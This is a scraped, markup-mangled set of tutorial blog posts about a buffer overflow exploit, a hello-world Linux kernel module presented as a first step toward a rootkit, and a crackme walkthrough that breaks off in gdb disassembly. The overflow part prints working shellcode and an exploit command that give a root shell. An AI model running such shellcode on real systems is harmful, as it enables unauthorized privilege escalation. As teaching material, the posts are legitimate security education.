out:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanspan class="nb"export/span span class="nv"SHELLCODE/spanspan class="o"=/spanspan class="k"$(/spanpython -c span class="s1"#39;print quot;\x90quot; * 500 + quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;#39;/spanspan class="k")/span/span span class="code-line"span class="gp"[email protected]:~$ /span./getenvaddr SHELLCODE ./app/span span class="code-line"span class="go"SHELLCODE will be at 0xbffff76c/span/span span class="code-line"span class="gp"[email protected]:~$ ./app $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;Aquot; * 528 + quot;\x6c\xf7\xff\xbfquot;#39;/spanspan class="o")/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanwhoami/span span class="code-line"span class="go"root/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED!!! :-D/p h2Conclusion/h2 pIt's very important to understand that when you are developing exploits you are always going to run into problems, that is why I left the bit in here where I didn't get root access. You will fail over and over again but if you continue trying you will find a way to hack it in the end. /p pThis was one of the simplest examples possible but before continuing it is important that you are able to do this. Don't worry if you don't understand how the application execution was hijacked or how the stack works, I will explain all of that in later tutorials when it is absolutely necessary, this tutorial is already long enough without going into more depth./p pI hope you enjoyed reading this as much as I enjoyed writing it./p pHappy Hacking :-)/p

First LKM

10 May 2014 at 07:46
By: 0xe7
pA a href="https://en.wikipedia.org/wiki/Loadable_kernel_module" target="_blank"loadable kernel module/a (LKM) is the easiest way to create a a href="https://en.wikipedia.org/wiki/Rootkit" target="_blank"rootkit/a, although it is also the most noisy and easiest to defend against. Once root (or system level privileges) is gained on a machine, a rootkit is the best way to maintain root access to that machine./p pHere I will try to explain the basics of what a LKM actually is and how to create and test a very basic one for a href="https://en.wikipedia.org/wiki/Linux" target="_blank"Linux/a./p !--more-- pAn LKM is a plugin to the a href="https://en.wikipedia.org/wiki/Kernel_%28computing%29" target="_blank"kernel/a. It allows you to run code with the same permissions as the kernel, which isn't possible for normal a href="https://en.wikipedia.org/wiki/User_space" target="_blank"userland/a applications. a href="https://en.wikipedia.org/wiki/Device_driver" target="_blank"Device drivers/a are LKM's as they need permission to access the computers hardware, so either with or without knowing it, you already have some experience with LKM's. Throughout this post I will be using LKM and module interchangeably./p h2Creating A Hello World LKM/h2 pHere is the code for the LKM that we will be creating:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/module.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/init.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="n"MODULE_AUTHOR/spanspan class="p"(/spanspan class="s"quot;0xe7, 0x1equot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_DESCRIPTION/spanspan class="p"(/spanspan class="s"quot;A simple hello world modulequot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_LICENSE/spanspan class="p"(/spanspan class="s"quot;GPLquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"__init/spanspan class="w" /spanspan class="n"hello_init/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printk/spanspan class="p"(/spanspan class="s"quot;Hello World!/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="n"__exit/spanspan class="w" /spanspan class="n"hello_exit/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printk/spanspan class="p"(/spanspan class="s"quot;Unloading hello./spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="n"module_init/spanspan class="p"(/spanspan class="n"hello_init/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"module_exit/spanspan class="p"(/spanspan class="n"hello_exit/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pLines 4 and 5 and just some information about the module. Line 6 is needed otherwise when we load the module we get the following error message in the systems log:/p pcodehello: module license 'unspecified' taints kernel./code/p pThe module will still load but as we are learning to write a rootkit, we want as little 'noise' as possible./p pThe function codehello_init/code on lines 8 - 12 runs when the module is loaded, here we are just printing "Hello World!\n" to the system log. The function codehello_exit/code on lines 14 - 18 runs when the module is unloaded, here we are just printing "Unloading hello.\n" to the system log. They are defined as such on lines 20 and 21./p h2Compiling The LKM/h2 pTo a href="https://en.wikipedia.org/wiki/Compiler" target="_blank"compile/a it we need a codeMakefile/code, the makefile below will do:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nv"obj-m/span span class="o"+=/span hello.o/span span class="code-line"/span span class="code-line"span class="nf"all/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span modules/span span class="code-line"/span span class="code-line"span class="nf"clean/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span clean/span span class="code-line"/code/pre/div /td/tr/table pWith both of these files in the same directory we can now compile our first LKM:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanmake/span span class="code-line"span class="go"make -C /lib/modules/3.12-kali1-686-pae/build M=/root/lkms modules/span/span span class="code-line"span class="go"make[1]: Entering directory `/usr/src/linux-headers-3.12-kali1-686-pae#39;/span/span span class="code-line"span class="go" CC [M] /root/lkms/hello.o/span/span span class="code-line"span class="go" Building modules, stage 2./span/span span class="code-line"span class="go" MODPOST 1 modules/span/span span class="code-line"span class="go" CC /root/lkms/hello.mod.o/span/span span class="code-line"span class="go" LD [M] /root/lkms/hello.ko/span/span span class="code-line"span class="go"make[1]: Leaving directory `/usr/src/linux-headers-3.12-kali1-686-pae#39;/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l/span span class="code-line"span class="go"total 160/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 384 May 12 19:35 hello.c/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 70621 May 12 19:35 hello.ko/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 650 May 12 19:35 hello.mod.c/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 39088 May 12 19:35 hello.mod.o/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 32540 May 12 19:35 hello.o/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 156 May 12 19:35 Makefile/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 27 May 12 19:35 modules.order/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 0 May 12 19:35 Module.symvers/span/span span class="code-line"/code/pre/div /td/tr/table pAs we can see, the codemake/code command has created a number of files (codehello.ko/code, codehello.mod.c/code, codehello.mod.o/code, codehello.o/code, codemodules.order/code, codeModule.symvers/code). The file we are interested in is codehello.ko/code on line 13, this is our module./p h2Loading/Unloading The LVM/h2 pI am using a 32 bit a href="https://www.debian.org/" target="_blank"Debian/a based Linux system (a href="http://www.kali.org/" target="_blank"Kali/a) for my development environment but this should work on any modern Linux system (Do not try this on a production machine! Working with the kernel always has the possiblity to crash the kernel and bring the whole system down! You have been warned!), older systems might require some changes./p pHere is how we load and unload the module; and check that everything has worked:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanuname -r/span span class="code-line"span class="go"3.12-kali1-686-pae/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spaninsmod ./hello.ko/span span class="code-line"span class="gp"[email protected]:~/lkms# /spandmesg span class="p"|/span tail -n span class="m"1/span/span span class="code-line"span class="go"[692908.561165] Hello World!/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanlsmod span class="p"|/span grep hello/span span class="code-line"span class="go"hello 12363 0 /span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanrmmod hello/span span class="code-line"span class="gp"[email protected]:~/lkms# /spandmesg span class="p"|/span tail -n span class="m"1/span/span span class="code-line"span class="go"[692925.071683] Unloading hello./span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanlsmod span class="p"|/span grep hello/span span class="code-line"span class="gp"[email protected]:~/lkms#/span/span span class="code-line"/code/pre/div /td/tr/table pSo first I have shown you the Linux kernel version I am using with the codeuname/code command on line 1, this is just so if it doesn't work for you, you can check if they are the same version. The codeinsmod/code command is used to load the module on line 3 and we check the system log to make sure it has printed the string "Hello World!\n" using the codedmesg/code command on line 4. The codelsmod/code command is used on line 6 to check if the module is actually loaded. The codermmod/code command is used on line 8 to unload the module and the system log is checked again on line 9 to check that our printk has run correctly. Lastly we check with codelsmod/code again to make sure the module has been unloaded correctly./p pSo we have a working LKM./p h2Conclusion/h2 pIt is very easy to make mistakes with any programming but the majority of mistakes in a normal application will not bring a system down. While its always important to build and test code in a development environment, its even more important when coding an application that runs in kernelland as any tiny mistake can, and most likely will, bring the system down./p pHappy Hacking :-)/p

An Easy Linux Crackme

11 May 2014 at 08:28
By: 0xe7
pThe website http://crackmes.de contains a huge collection of applications that have been specifically created for people to practice a href="https://en.wikipedia.org/wiki/Reverse_engineering"reverse engineering/a, a href="https://en.wikipedia.org/wiki/Software_cracking"software cracking/a and a href="https://en.wikipedia.org/wiki/Keygen"keygen/a writing./p pThis solution tutorial is for a very easy one but one that can be cracked without much reverse engineering experience and knowledge. It will, however, help if you understand how function calls work at the assembly level and how the stack works./p !--more-- h2The App/h2 pHere we will take on this challenge: http://crackmes.de/users/seveb/crackme1//p pWe will work on the 32 bit version, as we will see this version is actually broken but the answer that we get works fine on the 64 bit version./p h2Get To Know The App/h2 pLets try to find out some information about this application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spantar vxzf crackme01.tar.gz /span span class="code-line"span class="go"crackmes//span/span span class="code-line"span class="go"crackmes/crackme1_64bit/span/span span class="code-line"span class="go"crackmes/crackme1_32bit/span/span span class="code-line"span class="gp"[email protected]:~# /spanspan class="nb"cd/span crackmes/span span class="code-line"span class="gp"[email protected]:~/crackmes# /spanfile ./crackme1_32bit /span span class="code-line"span class="go"./crackme1_32bit: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x54fefefcb89fa2ccc70e24ac5f15fe5f5f44ef8b, not stripped/span/span span class="code-line"span class="gp"[email protected]:~/crackmes# /spanreadelf -h ./crackme1_32bit /span span class="code-line"span class="go"ELF Header:/span/span span class="code-line"span class="go" Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 /span/span span class="code-line"span class="go" Class: ELF32/span/span span class="code-line"span class="go" Data: 2#39;s complement, little endian/span/span span class="code-line"span class="go" Version: 1 (current)/span/span span class="code-line"span class="go" OS/ABI: UNIX - System V/span/span span class="code-line"span class="go" ABI Version: 0/span/span span class="code-line"span class="go" Type: EXEC (Executable file)/span/span span class="code-line"span class="go" Machine: Intel 80386/span/span span class="code-line"span class="go" Version: 0x1/span/span span class="code-line"span class="go" Entry point address: 0x8048510/span/span span class="code-line"span class="go" Start of program headers: 52 (bytes into file)/span/span span class="code-line"span class="go" Start of section headers: 4508 (bytes into file)/span/span span class="code-line"span class="go" Flags: 0x0/span/span span class="code-line"span class="go" Size of this header: 52 (bytes)/span/span span class="code-line"span class="go" Size of program headers: 32 (bytes)/span/span span class="code-line"span class="go" Number of program headers: 9/span/span span class="code-line"span class="go" Size of section headers: 40 (bytes)/span/span span class="code-line"span class="go" Number of section headers: 30/span/span span class="code-line"span class="go" Section header string table index: 27/span/span span class="code-line"span class="gp"[email protected]:~/crackmes# /span./crackme1_32bit /span span class="code-line"span class="go"Please enter the secret number: 0123456789/span/span span class="code-line"span class="go"Nope./span/span span class="code-line"span class="gp"[email protected]:~/crackmes# echo $/span?/span span class="code-line"span class="go"1/span/span span class="code-line"span class="gp"[email protected]:~/crackmes# /spanstrings ./crackme1_32bit /span span class="code-line"span class="go"/lib/ld-linux.so.2/span/span span class="code-line"span class="go"libc.so.6/span/span span class="code-line"span class="go"_IO_stdin_used/span/span span class="code-line"span class="go"fflush/span/span span class="code-line"span class="go"exit/span/span span class="code-line"span class="go"__isoc99_scanf/span/span span class="code-line"span class="go"puts/span/span span class="code-line"span class="go"__stack_chk_fail/span/span span class="code-line"span class="go"stdin/span/span span class="code-line"span class="go"printf/span/span span class="code-line"span class="go"strlen/span/span span class="code-line"span class="go"atoi/span/span span class="code-line"span class="go"strcmp/span/span span class="code-line"span class="go"__libc_start_main/span/span span class="code-line"span class="go"__gmon_start__/span/span span class="code-line"span class="go"GLIBC_2.7/span/span span class="code-line"span class="go"GLIBC_2.4/span/span span class="code-line"span class="go"GLIBC_2.0/span/span span class="code-line"span class="go"PTRh0/span/span span class="code-line"span class="go"QVhL/span/span span class="code-line"span class="go"D$L1/span/span span class="code-line"span class="go"D$6lt;9u /span/span span class="code-line"span class="go"D$5lt;6t/span/span span class="code-line"span class="go"D$-E/span/span span class="code-line"span class="go"\$Le3/span/span span class="code-line"span class="go"[^_]/span/span span class="code-line"span class="go"Nope./span/span span class="code-line"span class="go"Good job./span/span span class="code-line"span class="go"Please enter the secret number: /span/span span class="code-line"span class="gp"%/span23s/span span class="code-line"span class="go"Evilzone/span/span span class="code-line"span class="go"The Password translates into %s, /span/span span class="code-line"span class="go";*2$quot;/span/span span class="code-line"/code/pre/div /td/tr/table pWe have got a lot of information here, firstly we run codefile/code on line 6 and can see that the file is actually a 32 bit a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format"ELF file/a. This is the file format used for Linux executables./p pLooking at the a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#File_header"elf headers/a using codereadelf -h/code tells us the a href="https://en.wikipedia.org/wiki/Entry_point"entry point/a address of the application (on line 19), meaning this is the point in memory where execution begins, this could be useful later./p pRunning the application, it asks us for a "secret number". Putting in something random gives us the output codeNope./code (on line 31) and exits with exit code 1 (on line 33)./p pLastly we've run codestrings/code against the application (on line 34) which gives us a list of all of the clear text strings in the executable. 2 things stand out, the codeGood job./code string on line 62, which looks like this is printed to screen if you input the right number, and the codeEvilzone/code as well as the codeThe Password translates into %s,/code stings on lines 65 and 66 respectively. Based on these last 2 strings it looks like the secret number has something to do with the string codeEvilzone/code./p h2Disassemble / Debug The App/h2 pNormally now we could use a href="https://sourceware.org/binutils/docs/binutils/objdump.html"objdump/a but as this is such an easy one lets go straight into live a href="https://en.wikipedia.org/wiki/Debugging"debugging/a with codegdb/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/crackmes# /spangdb -q ./crackme1_32bit/span span class="code-line"span class="go"Reading symbols from /root/crackme/crackmes/crackme1_32bit...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"info functions/span/span span class="code-line"span class="go"All defined functions:/span/span span class="code-line"/span span class="code-line"span class="go"Non-debugging symbols:/span/span span class="code-line"span class="go"0x08048420 _init/span/span span class="code-line"span class="go"0x08048460 strcmp/span/span span class="code-line"span class="go"0x08048460 [email protected]/span/span span class="code-line"span class="go"0x08048470 printf/span/span span class="code-line"span class="go"0x08048470 [email protected]/span/span span class="code-line"span class="go"0x08048480 fflush/span/span span class="code-line"span class="go"0x08048480 [email protected]/span/span span class="code-line"span class="go"0x08048490 __stack_chk_fail/span/span span class="code-line"span class="go"0x08048490 [email protected]/span/span span class="code-line"span class="go"0x080484a0 puts/span/span span class="code-line"span class="go"0x080484a0 [email protected]/span/span span class="code-line"span class="go"0x080484b0 __gmon_start__/span/span span class="code-line"span class="go"0x080484b0 [email protected]/span/span span class="code-line"span class="go"0x080484c0 exit/span/span span class="code-line"span class="go"0x080484c0 [email protected]/span/span span class="code-line"span class="go"0x080484d0 strlen/span/span span class="code-line"span class="go"0x080484d0 [email protected]/span/span span class="code-line"span class="go"0x080484e0 __libc_start_main/span/span span class="code-line"span class="go"0x080484e0 [email protected]/span/span span class="code-line"span class="go"0x080484f0 __isoc99_scanf/span/span span class="code-line"span class="go"0x080484f0 [email protected]/span/span span class="code-line"span class="go"0x08048500 atoi/span/span span class="code-line"span class="go"0x08048500 [email protected]/span/span span class="code-line"span class="go"0x08048510 _start/span/span span class="code-line"span class="go"0x08048540 __x86.get_pc_thunk.bx/span/span span class="code-line"span class="go"0x08048550 deregister_tm_clones/span/span span class="code-line"span class="go"0x08048580 register_tm_clones/span/span span class="code-line"span class="go"0x080485c0 __do_global_dtors_aux/span/span span class="code-line"span class="go"0x080485e0 frame_dummy/span/span span class="code-line"span class="go"0x0804860d nope/span/span span class="code-line"span class="go"0x08048638 yes/span/span span class="code-line"span class="go"0x0804864c main/span/span span class="code-line"span class="go"0x080487c0 __libc_csu_init/span/span span class="code-line"span class="go"0x08048830 __libc_csu_fini/span/span span class="code-line"span class="go"0x08048834 _fini/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go" 0x0804864c lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804864d lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x0804864f lt;+3gt;: push ebx/span/span span class="code-line"span class="go" 0x08048650 lt;+4gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go" 0x08048653 lt;+7gt;: sub esp,0x50/span/span span class="code-line"span class="go" 0x08048656 lt;+10gt;: mov eax,gs:0x14/span/span span class="code-line"span class="go" 0x0804865c lt;+16gt;: mov DWORD PTR [esp+0x4c],eax/span/span span class="code-line"span class="go" 0x08048660 lt;+20gt;: xor eax,eax/span/span span class="code-line"span class="go" 0x08048662 lt;+22gt;: mov DWORD PTR [esp],0x8048860/span/span 